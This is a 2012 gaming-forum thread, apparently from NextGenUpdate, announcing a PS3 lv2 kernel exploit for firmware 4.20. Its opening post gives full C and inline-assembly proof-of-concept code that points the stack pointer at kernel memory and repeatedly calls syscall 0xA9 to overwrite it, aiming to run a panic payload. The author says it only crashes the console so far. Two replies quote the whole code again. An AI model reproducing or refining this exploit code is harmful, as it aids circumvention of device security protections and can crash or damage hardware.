Post: KDSBest releases his lv2_exploit for v4.20
Options
09-29-2012, 08:37 AM
#1
Luis
Guest
Sadly, it seems to not work on later Sony firmwares:
Originally posted by another user
I didn't managed to make it work on 4.21 so I just did on 4.20
Some information about this method from KDSBest:
Originally posted by another user
Since @naehrwert posted an lv2 exploit I will do so too You must login or register to view this content.. The stack pointer points to lv2 and if we do a syscall, the syscall saves register to the stack HAHA. You must login or register to view this content. Btw. It just crashes the console for now, since I totaly overwrite dump the lv2 or some memory addresses I don't know. Feel free to try around, adjust the address of the stackpointer and so on. If you managed to get the panic payload executed. Tell me!!! ^^
Here is his sample code, for other developers to try it out:
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0x00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
// We write sc
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
if(counter < 0x1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
}
Of course remember this stuff is of no use to the current end-user, but it gives us hope there is progress slowly on getting past v3.55 CFW! You must login or register to view this content.
You must login or register to view this content.
09-29-2012, 10:20 AM
#3
riggstq
[move]Haters Gonna Hate[/move]
Originally posted by Luis
First, we had scene developer 'naehrwert' posting information on how to exploit lv2, and now another developer 'KDSBest' has jump onto it, and written one that works on firmware v4.20.
Sadly, it seems to not work on later Sony firmwares:
Some information about this method from KDSBest:
Here is his sample code, for other developers to try it out:
Of course remember this stuff is of no use to the current end-user, but it gives us hope there is progress slowly on getting past v3.55 CFW! You must login or register to view this content.
You must login or register to view this content.
Sadly, it seems to not work on later Sony firmwares:
Some information about this method from KDSBest:
Here is his sample code, for other developers to try it out:
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0x00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
// We write sc
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
if(counter < 0x1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
}
Of course remember this stuff is of no use to the current end-user, but it gives us hope there is progress slowly on getting past v3.55 CFW! You must login or register to view this content.
You must login or register to view this content.
sorry if i sound a bit noobish but say someone was to successfully "exploit" the lv2 what would you gain from doing so? sounds pretty interesting..
09-30-2012, 05:47 AM
#4
primetime43
Knowledge is power 
Originally posted by Luis
First, we had scene developer 'naehrwert' posting information on how to exploit lv2, and now another developer 'KDSBest' has jump onto it, and written one that works on firmware v4.20.
Sadly, it seems to not work on later Sony firmwares:
Some information about this method from KDSBest:
Here is his sample code, for other developers to try it out:
Of course remember this stuff is of no use to the current end-user, but it gives us hope there is progress slowly on getting past v3.55 CFW! You must login or register to view this content.
You must login or register to view this content.
Sadly, it seems to not work on later Sony firmwares:
Some information about this method from KDSBest:
Here is his sample code, for other developers to try it out:
//compile: ppu-gcc kds2.c -o kds2.elf
//or: ppu-lv2-gcc kds2.c -o kds2.elf
register unsigned long long payloadHolder2 asm ("r21");
register unsigned long long payloadHolder asm ("r20");
register unsigned long long stackpointer asm ("r1");
register unsigned long long counter asm ("r25");
register unsigned long long bufferStackpointer asm ("r26");
int __volatile__ main(int argc, const char* argv[])
{
// backup Stack pointer
bufferStackpointer = stackpointer;
payloadHolder = 0x3960024F3960024FUL;
payloadHolder2 = 0x4400000244000002UL;
// Incrementer
counter = 0x00;
// Play with that address till the panic is executed, I lack of time todo so
// add always 2 or 4 to it, i would try 4 or 8... bla bla you will get the idea
stackpointer = 0x8000000000000100UL;
doItAgain:
// KDSBest Payload
// Prepare for our Syscall
asm("li %r0, 0x0");
asm("li %r3, 0x6");
asm("li %r4, 0x1");
// li r11, 0x24F -> PANIC
asm("mr %r22, %r20");
asm("mr %r23, %r20");
asm("mr %r24, %r20");
asm("mr %r27, %r20");
asm("mr %r28, %r20");
asm("mr %r29, %r20");
asm("mr %r30, %r20");
asm("mr %r31, %r20");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
// We write sc
asm("mr %r22, %r21");
asm("mr %r23, %r21");
asm("mr %r24, %r21");
asm("mr %r27, %r21");
asm("mr %r28, %r21");
asm("mr %r29, %r21");
asm("mr %r30, %r21");
asm("mr %r31, %r21");
// Stack Pointer = Build Address of LV2
stackpointer += counter;
// Syscall 0xA9
asm("li %r11, 0xA9");
asm("sc");
counter += 0x04;
if(counter < 0x1000000)
goto doItAgain;
stackpointer = bufferStackpointer;
return 0;
}
Of course remember this stuff is of no use to the current end-user, but it gives us hope there is progress slowly on getting past v3.55 CFW! You must login or register to view this content.
You must login or register to view this content.
Old as fak.
Copyright © 2026, NextGenUpdate.
All Rights Reserved.
